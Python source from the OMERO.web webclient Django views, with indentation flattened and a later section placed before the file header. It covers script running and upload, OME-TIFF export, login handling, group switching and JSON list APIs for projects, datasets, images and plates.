try:
params = scriptService.getParams(sId)
except Exception as x:
if x.message and x.message.startswith("No processor available"):
# Delegate to run_script() for handling 'No processor available'
rsp = run_script(request, conn, sId, inputMap, scriptName="Script")
return JsonResponse(rsp)
else:
raise
params = scriptService.getParams(sId)
scriptName = params.name.replace("_", " ").replace(".py", "")
logger.debug("Script: run with request.POST: %s" % request.POST)
# upload new file
fileupload = (
"file_annotation" in request.FILES and request.FILES["file_annotation"] or None
)
fileAnnId = None
if fileupload is not None and fileupload != "":
manager = BaseContainer(conn)
fileAnnId = manager.createFileAnnotations(fileupload, [])
for key, param in params.inputs.items():
prototype = param.prototype
pclass = prototype.__class__
if key == "File_Annotation" and fileAnnId is not None:
inputMap[key] = pclass(str(fileAnnId))
continue
# handle bool separately, since unchecked checkbox will not be in
# request.POST
if pclass == omero.rtypes.RBoolI:
value = key in request.POST
inputMap[key] = pclass(value)
continue
if pclass.__name__ == "RMapI":
keyName = "%s_key0" % key
valueName = "%s_value0" % key
row = 0
paramMap = {}
while keyName in request.POST:
# the key and value don't have any data-type defined by
# scripts - just use string
k = str(request.POST[keyName])
v = request.POST[valueName]
if len(k) > 0 and len(v) > 0:
paramMap[str(k)] = v
row += 1
keyName = "%s_key%d" % (key, row)
valueName = "%s_value%d" % (key, row)
if len(paramMap) > 0:
inputMap[key] = wrap(paramMap)
continue
if key in request.POST:
if pclass == omero.rtypes.RListI:
values = request.POST.getlist(key)
if len(values) == 0:
continue
if len(values) == 1: # process comma-separated list
if len(values[0]) == 0:
continue
values = values[0].split(",")
# try to determine 'type' of values in our list
listClass = omero.rtypes.RStringI
pval = prototype.val # list
# check if a value type has been set (first item of prototype
# list)
if len(pval) > 0:
listClass = pval[0].__class__
if listClass == int(1).__class__:
listClass = omero.rtypes.rint
if listClass == long(1).__class__:
listClass = omero.rtypes.rlong
# construct our list, using appropriate 'type'
valueList = []
for v in values:
try:
# RStringI() will encode any unicode
obj = listClass(v.strip())
except Exception:
logger.debug("Invalid entry for '%s' : %s" % (key, v))
continue
if isinstance(obj, omero.model.IObject):
valueList.append(omero.rtypes.robject(obj))
else:
valueList.append(obj)
inputMap[key] = omero.rtypes.rlist(valueList)
# Handle other rtypes: String, Long, Int etc.
else:
value = request.POST[key]
if len(value) == 0:
continue
try:
inputMap[key] = pclass(value)
except Exception:
logger.debug("Invalid entry for '%s' : %s" % (key, value))
continue
# If we have objects specified via 'IDs' and 'DataType', try to pick
# correct group
if "IDs" in inputMap and "Data_Type" in inputMap:
gid = conn.SERVICE_OPTS.getOmeroGroup()
conn.SERVICE_OPTS.setOmeroGroup("-1")
try:
firstObj = conn.getObject(
inputMap["Data_Type"].val, unwrap(inputMap["IDs"])[0]
)
newGid = firstObj.getDetails().group.id.val
conn.SERVICE_OPTS.setOmeroGroup(newGid)
except Exception:
logger.debug(traceback.format_exc())
# if inputMap values not as expected or firstObj is None
conn.SERVICE_OPTS.setOmeroGroup(gid)
try:
# Try/except in case inputs are not serializable, e.g. unicode
logger.debug("Running script %s with " "params %s" % (scriptName, inputMap))
except Exception:
pass
rsp = run_script(request, conn, sId, inputMap, scriptName)
return JsonResponse(rsp)
@login_required(isAdmin=True)
@render_response()
def script_upload(request, conn=None, **kwargs):
"""Script upload UI"""
if request.method != "POST":
return {"template": "webclient/scripts/upload_script.html"}
# Get script path, name and text
script_path = request.POST.get("script_path")
script_file = request.FILES["script_file"]
script_file.seek(0)
script_text = script_file.read().decode("utf-8")
if not script_path.endswith("/"):
script_path = script_path + "/"
script_path = script_path + script_file.name
# If script exists, replace. Otherwise upload
scriptService = conn.getScriptService()
script_id = scriptService.getScriptID(script_path)
try:
if script_id > 0:
orig_file = OriginalFileI(script_id, False)
scriptService.editScript(orig_file, script_text)
message = "Script Replaced: %s" % script_file.name
else:
script_id = scriptService.uploadOfficialScript(script_path, script_text)
message = "Script Uploaded: %s" % script_file.name
except omero.ValidationException as ex:
message = str(ex)
return {"Message": message, "script_id": script_id}
@require_POST
@login_required()
def ome_tiff_script(request, imageId, conn=None, **kwargs):
"""
Uses the scripting service (Batch Image Export script) to generate
OME-TIFF for an image and attach this as a file annotation to the image.
Script will show up in the 'Activities' for users to monitor and download
result etc.
"""
scriptService = conn.getScriptService()
sId = scriptService.getScriptID("/omero/export_scripts/Batch_Image_Export.py")
image = conn.getObject("Image", imageId)
if image is not None:
gid = image.getDetails().group.id.val
conn.SERVICE_OPTS.setOmeroGroup(gid)
imageIds = [long(imageId)]
inputMap = {
"Data_Type": wrap("Image"),
"IDs": rlist([rlong(id) for id in imageIds]),
}
inputMap["Format"] = wrap("OME-TIFF")
rsp = run_script(request, conn, sId, inputMap, scriptName="Create OME-TIFF")
return JsonResponse(rsp)
def run_script(request, conn, sId, inputMap, scriptName="Script"):
"""
Starts running a script, adding details to the request.session so that it
shows up in the webclient Activities panel and results are available there
etc.
"""
request.session.modified = True
scriptService = conn.getScriptService()
try:
handle = scriptService.runScript(sId, inputMap, None, conn.SERVICE_OPTS)
# E.g. ProcessCallback/4ab13b23-22c9-4b5f-9318-40f9a1acc4e9 -t:tcp -h 10.37.129.2 -p 53154:tcp -h 10.211.55.2 -p 53154:tcp -h 10.12.1.230 -p 53154 # noqa
jobId = str(handle)
status = "in progress"
request.session["callback"][jobId] = {
"job_type": "script",
"job_name": scriptName,
"start_time": datetime.datetime.now(),
"status": status,
}
request.session.modified = True
except Exception as x:
jobId = str(time()) # E.g. 1312803670.6076391
# handle python 2 or 3 errors
message = x.message if hasattr(x, "message") else (x.args[0] if x.args else "")
if message and message.startswith("No processor available"):
# omero.ResourceError
logger.info(traceback.format_exc())
error = "No Processor Available"
status = "no processor available"
message = "" # template displays message and link
else:
# Don't log user mistake as ERROR
if isinstance(x, omero.ValidationException):
logger.debug(x.message)
else:
logger.error(traceback.format_exc())
error = traceback.format_exc()
status = "failed"
message = x.message
# save the error to http session, for display in 'Activities' window
request.session["callback"][jobId] = {
"job_type": "script",
"job_name": scriptName,
"start_time": datetime.datetime.now(),
"status": status,
"Message": message,
"error": error,
}
return {"status": status, "error": error}
return {"jobId": jobId, "status": status}
@login_required()
@render_response()
def ome_tiff_info(request, imageId, conn=None, **kwargs):
"""
Query to see if we have an OME-TIFF attached to the image (assume only 1,
since Batch Image Export will delete old ones)
"""
# Any existing OME-TIFF will appear in list
links = list(
conn.getAnnotationLinks(
"Image", [imageId], ns=omero.constants.namespaces.NSOMETIFF
)
)
rv = {}
if len(links) > 0:
# use highest ID === most recent
links.sort(key=lambda x: x.getId(), reverse=True)
annlink = links[0]
created = annlink.creationEventDate()
annId = annlink.getChild().getId()
from omeroweb.webgateway.templatetags.common_filters import ago
download = reverse("download_annotation", args=[annId])
rv = {
"created": str(created),
"ago": ago(created),
"id": annId,
"download": download,
}
return rv # will get returned as json by default
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2008-2020 University of Dundee & Open Microscopy Environment.
# All rights reserved.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
""" A view functions is simply a Python function that takes a Web request and
returns a Web response. This response can be the HTML contents of a Web page,
or a redirect, or the 404 and 500 error, or an XML document, or an image...
or anything."""
import copy
import os
import datetime
import Ice
from Ice import Exception as IceException
import logging
import traceback
import json
import re
import sys
import warnings
from past.builtins import unicode
from future.utils import bytes_to_native_str
from django.utils.html import escape
from django.utils.http import is_safe_url
from time import time
from omeroweb.version import omeroweb_buildyear as build_year
from omeroweb.version import omeroweb_version as omero_version
import omero
import omero.scripts
from omero.rtypes import wrap, unwrap, rlong, rlist
from omero.gateway.utils import toBoolean
from django.conf import settings
from django.template import loader as template_loader
from django.http import (
Http404,
HttpResponse,
HttpResponseRedirect,
JsonResponse,
HttpResponseForbidden,
)
from django.http import HttpResponseServerError, HttpResponseBadRequest
from django.utils.http import urlencode
from django.core.urlresolvers import reverse, NoReverseMatch
from django.utils.encoding import smart_str
from django.views.decorators.cache import never_cache
from django.views.decorators.http import require_POST
from django.shortcuts import render
from omeroweb.webclient.webclient_utils import _formatReport, _purgeCallback
from .forms import GlobalSearchForm, ContainerForm
from .forms import ShareForm
from .forms import ContainerNameForm, ContainerDescriptionForm
from .forms import CommentAnnotationForm, TagsAnnotationForm
from .forms import MetadataFilterForm, MetadataDetectorForm
from .forms import MetadataChannelForm, MetadataEnvironmentForm
from .forms import MetadataObjectiveForm, MetadataObjectiveSettingsForm
from .forms import MetadataStageLabelForm, MetadataLightSourceForm
from .forms import MetadataDichroicForm, MetadataMicroscopeForm
from .forms import FilesAnnotationForm, WellIndexForm, NewTagsAnnotationFormSet
from .controller.container import BaseContainer
from .controller.history import BaseCalendar
from .controller.search import BaseSearch
from .controller.share import BaseShare
from omeroweb.webadmin.forms import LoginForm
from omeroweb.webgateway import views as webgateway_views
from omeroweb.webgateway.marshal import graphResponseMarshal
from omeroweb.webgateway.util import get_longs as webgateway_get_longs
from omeroweb.feedback.views import handlerInternalError
from omeroweb.webclient.decorators import login_required
from omeroweb.webclient.decorators import render_response
from omeroweb.webclient.show import (
Show,
IncorrectMenuError,
paths_to_object,
paths_to_tag,
)
from omeroweb.decorators import (
ConnCleaningHttpResponse,
parse_url,
TableClosingHttpResponse,
)
from omeroweb.webgateway.util import getIntOrDefault
from omero.model import (
AnnotationAnnotationLinkI,
DatasetI,
DatasetImageLinkI,
ExperimenterI,
ImageI,
OriginalFileI,
PlateI,
ProjectI,
ProjectDatasetLinkI,
ScreenI,
ScreenPlateLinkI,
TagAnnotationI,
)
from omero import ApiUsageException, ServerError, CmdError
from omeroweb.webgateway.views import LoginView
from . import tree
try:
import long
except ImportError:
long = int
logger = logging.getLogger(__name__)
logger.info("INIT '%s'" % os.getpid())
# We want to allow a higher default limit for annotations so we can load
# all the annotations expected for a PAGE of images
ANNOTATIONS_LIMIT = settings.PAGE * 100
def get_long_or_default(request, name, default):
"""
Retrieves a parameter from the request. If the parameter is not present
the default is returned
This does not catch exceptions as it makes sense to throw exceptions if
the arguments provided do not pass basic type validation
"""
val = None
val_raw = request.GET.get(name, default)
if val_raw is not None:
val = long(val_raw)
return val
def get_list(request, name):
val = request.GET.getlist(name)
return [i for i in val if i != ""]
def get_longs(request, name):
warnings.warn(
"Deprecated. Use omeroweb.webgateway.util.get_longs()", DeprecationWarning
)
return webgateway_get_longs(request, name)
def get_bool_or_default(request, name, default):
"""
Retrieves a parameter from the request. If the parameter is not present
the default is returned
This does not catch exceptions as it makes sense to throw exceptions if
the arguments provided do not pass basic type validation
"""
return toBoolean(request.GET.get(name, default))
def validate_redirect_url(url):
"""
Returns a URL is safe to redirect to.
If url is a different host, not in settings.REDIRECT_ALLOWED_HOSTS
we return webclient index URL.
"""
if not is_safe_url(url, allowed_hosts=settings.REDIRECT_ALLOWED_HOSTS):
url = reverse("webindex")
return url
##############################################################################
# custom index page
@never_cache
@render_response()
def custom_index(request, conn=None, **kwargs):
context = {"version": omero_version, "build_year": build_year}
if settings.INDEX_TEMPLATE is not None:
try:
template_loader.get_template(settings.INDEX_TEMPLATE)
context["template"] = settings.INDEX_TEMPLATE
except Exception:
context["template"] = "webclient/index.html"
context["error"] = traceback.format_exception(*sys.exc_info())[-1]
else:
context["template"] = "webclient/index.html"
return context
##############################################################################
# views
class WebclientLoginView(LoginView):
"""
Webclient Login - Customises the superclass LoginView
for webclient. Also can be used by other Apps to log in to OMERO. Uses
the 'server' id from request to lookup the server-id (index), host and
port from settings. E.g. "localhost", 4064. Stores these details, along
with username, password etc in the request.session. Resets other data
parameters in the request.session. Tries to get connection to OMERO and
if this works, then we are redirected to the 'index' page or url
specified in REQUEST. If we can't connect, the login page is returned
with appropriate error messages.
"""
template = "webclient/login.html"
useragent = "OMERO.web"
def get(self, request):
"""
GET simply returns the login page
"""
return self.handle_not_logged_in(request)
def handle_logged_in(self, request, conn, connector):
"""
We override this to provide webclient-specific functionality
such as cleaning up any previous sessions (if user didn't logout)
and redirect to specified url or webclient index page.
"""
# webclient has various state that needs cleaning up...
# if 'active_group' remains in session from previous
# login, check it's valid for this user
# NB: we do this for public users in @login_required.get_connection()
if request.session.get("active_group"):
if (
request.session.get("active_group")
not in conn.getEventContext().memberOfGroups
):
del request.session["active_group"]
if request.session.get("user_id"):
# always want to revert to logged-in user
del request.session["user_id"]
if request.session.get("server_settings"):
# always clean when logging in
del request.session["server_settings"]
# do we ned to display server version ?
# server_version = conn.getServerVersion()
if request.POST.get("noredirect"):
return HttpResponse("OK")
url = request.GET.get("url")
if url is None or len(url) == 0:
try:
url = parse_url(settings.LOGIN_REDIRECT)
except Exception:
url = reverse("webindex")
else:
url = validate_redirect_url(url)
return HttpResponseRedirect(url)
def handle_not_logged_in(self, request, error=None, form=None):
"""
Returns a response for failed login.
Reason for failure may be due to server 'error' or because
of form validation errors.
@param request: http request
@param error: Error message
@param form: Instance of Login Form, populated with data
"""
if form is None:
server_id = request.GET.get("server", request.POST.get("server"))
if server_id is not None:
initial = {"server": unicode(server_id)}
form = LoginForm(initial=initial)
else:
form = LoginForm()
context = {
"version": omero_version,
"build_year": build_year,
"error": error,
"form": form,
}
url = request.GET.get("url")
if url is not None and len(url) != 0:
context["url"] = urlencode({"url": url})
if hasattr(settings, "LOGIN_LOGO"):
context["LOGIN_LOGO"] = settings.LOGIN_LOGO
if settings.PUBLIC_ENABLED:
redirect = reverse("webindex")
if settings.PUBLIC_URL_FILTER.search(redirect):
context["public_enabled"] = True
context["public_login_redirect"] = redirect
context["show_download_links"] = settings.SHOW_CLIENT_DOWNLOADS
if settings.SHOW_CLIENT_DOWNLOADS:
ver = re.match(
(
r"(?P<major>\d+)\."
r"(?P<minor>\d+)\."
r"(?P<patch>\d+\.?)?"
r"(?P<dev>(dev|a|b|rc)\d+)?.*"
),
omero_version,
)
client_download_tag_re = "^v%s\\.%s\\.[^-]+$" % (
ver.group("major"),
ver.group("minor"),
)
context["client_download_tag_re"] = client_download_tag_re
context["client_download_repo"] = settings.CLIENT_DOWNLOAD_GITHUB_REPO
return render(request, self.template, context)
@login_required(ignore_login_fail=True)
def keepalive_ping(request, conn=None, **kwargs):
"""Keeps the OMERO session alive by pinging the server"""
# login_required handles ping, timeout etc, so we don't need to do
# anything else
return HttpResponse("OK")
@login_required()
def change_active_group(request, conn=None, url=None, **kwargs):
"""
Simply changes the request.session['active_group'] which is then used by
the @login_required decorator to configure conn for any group-based
queries.
Finally this redirects to the 'url'.
"""
switch_active_group(request)
# avoid recursive calls
if url is None or url.startswith(reverse("change_active_group")):
url = reverse("webindex")
url = validate_redirect_url(url)
return HttpResponseRedirect(url)
def switch_active_group(request, active_group=None):
"""
Simply changes the request.session['active_group'] which is then used by
the @login_required decorator to configure conn for any group-based
queries.
"""
if active_group is None:
active_group = get_long_or_default(request, "active_group", None)
if active_group is None:
return
active_group = int(active_group)
if (
"active_group" not in request.session
or active_group != request.session["active_group"]
):
request.session.modified = True
request.session["active_group"] = active_group
def fake_experimenter(request, default_name="All members"):
"""
Marshal faked experimenter when id is -1
Load omero.client.ui.menu.dropdown.everyone.label as username
"""
label = (
request.session.get("server_settings")
.get("ui", {})
.get("menu", {})
.get("dropdown", {})
.get("everyone", {})
.get("label", default_name)
)
return {
"id": -1,
"omeName": label,
"firstName": label,
"lastName": "",
}
@login_required(login_redirect="webindex")
def logout(request, conn=None, **kwargs):
"""
Logout of the session and redirects to the homepage (will redirect to
login first)
"""
if request.method == "POST":
try:
try:
conn.close()
except Exception:
logger.error("Exception during logout.", exc_info=True)
finally:
request.session.flush()
return HttpResponseRedirect(reverse(settings.LOGIN_VIEW))
else:
context = {"url": reverse("weblogout"), "submit": "Do you want to log out?"}
template = "webgateway/base/includes/post_form.html"
return render(request, template, context)
###########################################################################
def _load_template(request, menu, conn=None, url=None, **kwargs):
"""
This view handles most of the top-level pages, as specified by 'menu' E.g.
userdata, usertags, history, search etc.
Query string 'path' that specifies an object to display in the data tree
is parsed.
We also prepare the list of users in the current group, for the
switch-user form. Change-group form is also prepared.
"""
request.session.modified = True
template = kwargs.get("template", None)
if template is None:
if menu == "userdata":
template = "webclient/data/containers.html"
elif menu == "usertags":
template = "webclient/data/containers.html"
else:
# E.g. search/search.html
template = "webclient/%s/%s.html" % (menu, menu)
# tree support
show = kwargs.get("show", Show(conn, request, menu))
# Constructor does no loading. Show.first_selected must be called first
# in order to set up our initial state correctly.
try:
first_sel = show.first_selected
except IncorrectMenuError as e:
return HttpResponseRedirect(e.uri)
# We get the owner of the top level object, E.g. Project
# Actual api_paths_to_object() is retrieved by jsTree once loaded
initially_open_owner = show.initially_open_owner
# If we failed to find 'show'...
if request.GET.get("show", None) is not None and first_sel is None:
# and we're logged in as PUBLIC user...
if (
settings.PUBLIC_ENABLED
and settings.PUBLIC_USER == conn.getUser().getOmeName()
):
# this is likely a regular user who needs to log in as themselves.
# Login then redirect to current url
return HttpResponseRedirect("%s?url=%s" % (reverse("weblogin"), url))
# need to be sure that tree will be correct omero.group
if first_sel is not None:
group_id = first_sel.details.group.id.val
if conn.isValidGroup(group_id):
switch_active_group(request, group_id)
else:
first_sel = None
# search support
init = {}
global_search_form = GlobalSearchForm(data=request.GET.copy())
if menu == "search":
if global_search_form.is_valid():
init["query"] = global_search_form.cleaned_data["search_query"]
# get url without request string - used to refresh page after switch
# user/group etc
url = kwargs.get("load_template_url", None)
if url is None:
url = reverse(viewname="load_template", args=[menu])
# validate experimenter is in the active group
active_group = request.session.get("active_group") or conn.getEventContext().groupId
# prepare members of group...
leaders, members = conn.getObject("ExperimenterGroup", active_group).groupSummary()
userIds = [u.id for u in leaders]
userIds.extend([u.id for u in members])
# check any change in experimenter...
user_id = request.GET.get("experimenter")
if initially_open_owner is not None:
if request.session.get("user_id", None) != -1:
# if we're not already showing 'All Members'...
user_id = initially_open_owner
try:
user_id = long(user_id)
except Exception:
user_id = None
# check if user_id is in a currnt group
if user_id is not None:
if (
user_id
not in (
set(map(lambda x: x.id, leaders)) | set(map(lambda x: x.id, members))
)
and user_id != -1
):
# All users in group is allowed
user_id = None
if user_id is None:
# ... or check that current user is valid in active group
user_id = request.session.get("user_id", None)
if user_id is None or int(user_id) not in userIds:
if user_id != -1: # All users in group is allowed
user_id = conn.getEventContext().userId
request.session["user_id"] = user_id
myGroups = list(conn.getGroupsMemberOf())
myGroups.sort(key=lambda x: x.getName().lower())
groups = myGroups
new_container_form = ContainerForm()
# colleagues required for search.html page only.
myColleagues = {}
if menu == "search":
for g in groups:
g.loadLeadersAndMembers()
for c in g.leaders + g.colleagues:
myColleagues[c.id] = c
myColleagues = list(myColleagues.values())
myColleagues.sort(key=lambda x: x.getLastName().lower())
context = {
"menu": menu,
"init": init,
"myGroups": myGroups,
"new_container_form": new_container_form,
"global_search_form": global_search_form,
}
context["groups"] = groups
context["myColleagues"] = myColleagues
context["active_group"] = conn.getObject("ExperimenterGroup", long(active_group))
context["active_user"] = conn.getObject("Experimenter", long(user_id))
context["initially_select"] = show.initially_select
context["initially_open"] = show.initially_open
context["isLeader"] = conn.isLeader()
context["current_url"] = url
context["page_size"] = settings.PAGE
context["template"] = template
context["thumbnails_batch"] = settings.THUMBNAILS_BATCH
context["current_admin_privileges"] = conn.getCurrentAdminPrivileges()
context["leader_of_groups"] = conn.getEventContext().leaderOfGroups
context["member_of_groups"] = conn.getEventContext().memberOfGroups
context["search_default_user"] = settings.SEARCH_DEFAULT_USER
context["search_default_group"] = settings.SEARCH_DEFAULT_GROUP
return context
@login_required()
@render_response()
def load_template(request, menu, conn=None, url=None, **kwargs):
return _load_template(request=request, menu=menu, conn=conn, url=url, **kwargs)
@login_required()
@render_response()
def group_user_content(request, url=None, conn=None, **kwargs):
"""
Loads html content of the Groups/Users drop-down menu on main webclient
pages.
Url should be supplied in request, as target for redirect after switching
group.
"""
myGroups = list(conn.getGroupsMemberOf())
myGroups.sort(key=lambda x: x.getName().lower())
if conn.isAdmin(): # Admin can see all groups
system_groups = [
conn.getAdminService().getSecurityRoles().userGroupId,
conn.getAdminService().getSecurityRoles().guestGroupId,
]
groups = conn.getObjects("ExperimenterGroup", opts={"load_experimenters": True})
groups = [g for g in groups if g.getId() not in system_groups]
groups.sort(key=lambda x: x.getName().lower())
else:
groups = myGroups
for g in groups:
g.loadLeadersAndMembers() # load leaders / members
context = {
"template": "webclient/base/includes/group_user_content.html",
"current_url": url,
"groups": groups,
"myGroups": myGroups,
}
return context
@login_required()
def api_group_list(request, conn=None, **kwargs):
# Get parameters
try:
page = get_long_or_default(request, "page", 1)
limit = get_long_or_default(request, "limit", settings.PAGE)
member_id = get_long_or_default(request, "member", -1)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
try:
# Get the groups
groups = tree.marshal_groups(
conn=conn, member_id=member_id, page=page, limit=limit
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({"groups": groups})
@login_required()
def api_experimenter_detail(request, experimenter_id, conn=None, **kwargs):
# Validate parameter
try:
experimenter_id = long(experimenter_id)
except ValueError:
return HttpResponseBadRequest("Invalid experimenter id")
try:
# Get the experimenter
if experimenter_id < 0:
experimenter = fake_experimenter(request)
else:
# Get the experimenter
experimenter = tree.marshal_experimenter(
conn=conn, experimenter_id=experimenter_id
)
if experimenter is None:
raise Http404("No Experimenter found with ID %s" % experimenter_id)
return JsonResponse({"experimenter": experimenter})
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
@login_required()
def api_container_list(request, conn=None, **kwargs):
# Get parameters
try:
page = get_long_or_default(request, "page", 1)
limit = get_long_or_default(request, "limit", settings.PAGE)
group_id = get_long_or_default(request, "group", -1)
experimenter_id = get_long_or_default(request, "id", -1)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
# While this interface does support paging, it does so in a
# very odd way. The results per page is enforced per query so this
# will actually get the limit for projects, datasets (without
# parents), screens and plates (without parents). This is fine for
# the first page, but the second page may not be what is expected.
if not conn.isValidGroup(group_id):
return HttpResponseForbidden("Not a member of Group: %s" % group_id)
r = dict()
try:
# Get the projects
r["projects"] = tree.marshal_projects(
conn=conn,
group_id=group_id,
experimenter_id=experimenter_id,
page=page,
limit=limit,
)
# Get the orphaned datasets (without project parents)
r["datasets"] = tree.marshal_datasets(
conn=conn,
orphaned=True,
group_id=group_id,
experimenter_id=experimenter_id,
page=page,
limit=limit,
)
# Get the screens for the current user
r["screens"] = tree.marshal_screens(
conn=conn,
group_id=group_id,
experimenter_id=experimenter_id,
page=page,
limit=limit,
)
# Get the orphaned plates (without project parents)
r["plates"] = tree.marshal_plates(
conn=conn,
orphaned=True,
group_id=group_id,
experimenter_id=experimenter_id,
page=page,
limit=limit,
)
# Get the orphaned images container
try:
orph_t = request.session["server_settings"]["ui"]["tree"]["orphans"]
except Exception:
orph_t = {"enabled": True}
if (
conn.isAdmin()
or conn.isLeader(gid=request.session.get("active_group"))
or experimenter_id == conn.getUserId()
or orph_t.get("enabled", True)
):
orphaned = tree.marshal_orphaned(
conn=conn,
group_id=group_id,
experimenter_id=experimenter_id,
page=page,
limit=limit,
)
orphaned["name"] = orph_t.get("name", "Orphaned Images")
r["orphaned"] = orphaned
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse(r)
@login_required()
def api_dataset_list(request, conn=None, **kwargs):
# Get parameters
try:
page = get_long_or_default(request, "page", 1)
limit = get_long_or_default(request, "limit", settings.PAGE)
group_id = get_long_or_default(request, "group", -1)
project_id = get_long_or_default(request, "id", None)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
if not conn.isValidGroup(group_id):
return HttpResponseForbidden("Not a member of Group: %s" % group_id)
try:
# Get the datasets
datasets = tree.marshal_datasets(
conn=conn, project_id=project_id, group_id=group_id, page=page, limit=limit
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({"datasets": datasets})
@login_required()
def api_image_list(request, conn=None, **kwargs):
"""Get a list of images
Specifiying dataset_id will return only images in that dataset
Specifying experimenter_id will return orpahned images for that
user
The orphaned images will include images which belong to the user
but are not in any dataset belonging to the user
Currently specifying both, experimenter_id will be ignored
"""
# Get parameters
try:
page = get_long_or_default(request, "page", 1)
limit = get_long_or_default(request, "limit", settings.PAGE)
group_id = get_long_or_default(request, "group", -1)
dataset_id = get_long_or_default(request, "id", None)
orphaned = get_bool_or_default(request, "orphaned", False)
load_pixels = get_bool_or_default(request, "sizeXYZ", False)
thumb_version = get_bool_or_default(request, "thumbVersion", False)
date = get_bool_or_default(request, "date", False)
experimenter_id = get_long_or_default(request, "experimenter_id", -1)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
if not conn.isValidGroup(group_id):
return HttpResponseForbidden("Not a member of Group: %s" % group_id)
# Share ID is in kwargs from api/share_images/<id>/ which will create
# a share connection in @login_required.
# We don't support ?share_id in query string since this would allow a
# share connection to be created for ALL urls, instead of just this one.
share_id = "share_id" in kwargs and long(kwargs["share_id"]) or None
try:
# Get the images
images = tree.marshal_images(
conn=conn,
orphaned=orphaned,
experimenter_id=experimenter_id,
dataset_id=dataset_id,
share_id=share_id,
load_pixels=load_pixels,
group_id=group_id,
page=page,
date=date,
thumb_version=thumb_version,
limit=limit,
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({"images": images})
@login_required()
def api_plate_list(request, conn=None, **kwargs):
# Get parameters
try:
page = get_long_or_default(request, "page", 1)
limit = get_long_or_default(request, "limit", settings.PAGE)
group_id = get_long_or_default(request, "group", -1)
screen_id = get_long_or_default(request, "id", None)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
if not conn.isValidGroup(group_id):
return HttpResponseForbidden("Not a member of Group: %s" % group_id)
try:
# Get the plates
plates = tree.marshal_plates(
conn=conn, screen_id=screen_id, group_id=group_id, page=page, limit=limit
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({"plates": plates})
@login_required()
def api_plate_acquisition_list(request, conn=None, **kwargs):
# Get parameters
try:
page = get_long_or_default(request, "page", 1)
limit = get_long_or_default(request, "limit", settings.PAGE)
plate_id = get_long_or_default(request, "id", None)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
# Orphaned PlateAcquisitions are not possible so querying without a
# plate is an error
if plate_id is None:
return HttpResponseBadRequest("id (plate) must be specified")
try:
# Get the plate acquisitions
plate_acquisitions = tree.marshal_plate_acquisitions(
conn=conn, plate_id=plate_id, page=page, limit=limit
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({"acquisitions": plate_acquisitions})
def get_object_links(conn, parent_type, parent_id, child_type, child_ids):
"""This is just used internally by api_link DELETE below"""
if parent_type == "orphaned":
return None
link_type = None
if parent_type == "experimenter":
if child_type in ["dataset", "plate", "tag"]:
# This will be a requested link if a dataset or plate is
# moved from the de facto orphaned datasets/plates, it isn't
# an error, but no link actually needs removing
return None
elif parent_type == "project":
if child_type == "dataset":
link_type = "ProjectDatasetLink"
elif parent_type == "dataset":
if child_type == "image":
link_type = "DatasetImageLink"
elif parent_type == "screen":
if child_type == "plate":
link_type = "ScreenPlateLink"
elif parent_type == "tagset":
if child_type == "tag":
link_type = "AnnotationAnnotationLink"
if not link_type:
raise Http404("json data needs 'parent_type' and 'child_type'")
params = omero.sys.ParametersI()
params.addIds(child_ids)
qs = conn.getQueryService()
# Need to fetch child and parent, otherwise
# AnnotationAnnotationLink is not loaded
q = (
"""
from %s olink join fetch olink.child join fetch olink.parent
where olink.child.id in (:ids)
"""
% link_type
)
if parent_id:
params.add("pid", rlong(parent_id))
q += " and olink.parent.id = :pid"
res = qs.findAllByQuery(q, params, conn.SERVICE_OPTS)
if parent_id is not None and len(res) == 0:
raise Http404(
"No link found for %s-%s to %s-%s"
% (parent_type, parent_id, child_type, child_ids)
)
return link_type, res
def create_link(parent_type, parent_id, child_type, child_id):
"""This is just used internally by api_link DELETE below"""
if parent_type == "experimenter":
if child_type == "dataset" or child_type == "plate":
# This is actually not a link that needs creating, this
# dataset/plate is an orphan
return "orphan"
if parent_type == "project":
project = ProjectI(long(parent_id), False)
if child_type == "dataset":
dataset = DatasetI(long(child_id), False)
link = ProjectDatasetLinkI()
link.setParent(project)
link.setChild(dataset)
return link
elif parent_type == "dataset":
dataset = DatasetI(long(parent_id), False)
if child_type == "image":
image = ImageI(long(child_id), False)
link = DatasetImageLinkI()
link.setParent(dataset)
link.setChild(image)
return link
elif parent_type == "screen":
screen = ScreenI(long(parent_id), False)
if child_type == "plate":
plate = PlateI(long(child_id), False)
link = ScreenPlateLinkI()
link.setParent(screen)
link.setChild(plate)
